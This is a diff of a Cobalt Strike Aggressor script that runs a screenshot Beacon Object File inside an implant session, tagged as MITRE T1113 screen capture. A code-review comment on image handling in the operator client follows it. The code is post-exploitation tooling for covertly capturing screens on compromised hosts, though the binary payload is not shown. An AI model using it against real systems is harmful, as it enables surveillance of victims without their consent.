||||||
|
|
||||||
alias screenshot_bof {
|
alias screenshot_bof {
|
||||||
local('$barch $handle $data $args $target_pid');
|
local('$bid $barch $handle $data $args $target_pid');
|
||||||
println(@_);
|
$bid = $1;
|
||||||
# figure out the arch of this session
|
# figure out the arch of this session
|
||||||
$barch = barch($1);
|
$barch = barch($bid);
|
||||||
|
if (size(@_) != 3)
|
||||||
|
{
|
||||||
|
berror($1, "Syntax: screenshot_bof [filename] [save method 0/1] e.g. screenshot_bof file.bmp 1");
|
||||||
|
return;
|
||||||
|
}
|
||||||
# read in the right BOF file
|
# read in the right BOF file
|
||||||
$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
|
$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
|
||||||
$data = readb($handle, -1);
|
$data = readb($handle, -1);
|
||||||
closef($handle);
|
closef($handle);
|
||||||
|
|
||||||
$args = bof_pack($1, "z",$2);
|
# FEATURE PUT ON HOLD DUE TO STABILITY
|
||||||
|
# figure out if the profile chooses to chunk the post or not (getOnlyProfile)
|
||||||
|
# $profile = data_query("metadata")["c2profile"];
|
||||||
|
# $getOnlyProfile = [$profile shouldChunkPosts];
|
||||||
|
# println($getOnlyProfile);
|
||||||
|
|
||||||
|
$args = bof_pack($bid, "zi", $2, $3);
|
||||||
|
|
||||||
# announce what we're doing
|
# announce what we're doing
|
||||||
btask($1, "Running screenshot BOF by (@codex_tf2)");
|
btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113");
|
||||||
# execute it.
|
# execute it.
|
||||||
beacon_inline_execute($1, $data, "go", $args);
|
beacon_inline_execute($bid, $data, "go", $args);
|
||||||
}
|
}
|
||||||
|
|
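Review bot: `display_image` and `display_downloaded` call `[$image getWidth]` directly after `[ImageIO read: $bais]`, but `ImageIO.read` returns null when no registered reader can decode the stream, and the only gate in front of it is a two-byte `BM` check on bytes that arrive from the remote host. The `on screenshots` handler runs this automatically for every incoming screenshot, so a malformed or very large bitmap is decoded and scaled inside the operator client with no error path; add `if ($image is $null) { show_error("File is not a Bitmap image"); return; }` after the read and consider bounding the decoded width and height before `getScaledInstance`. Also, `local(...)` in both subs declares `$bias` while the code assigns `$bais`, and `$file_name` in `display_downloaded` plus `$handle` and `$data` in the `sync_download` callback are not declared local, so these end up as script-global variables. The callback passes `$1` (the temporary local path) to `display_downloaded` as the tab name although `$name` is handed to the lambda and never used.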
Binary file not shown.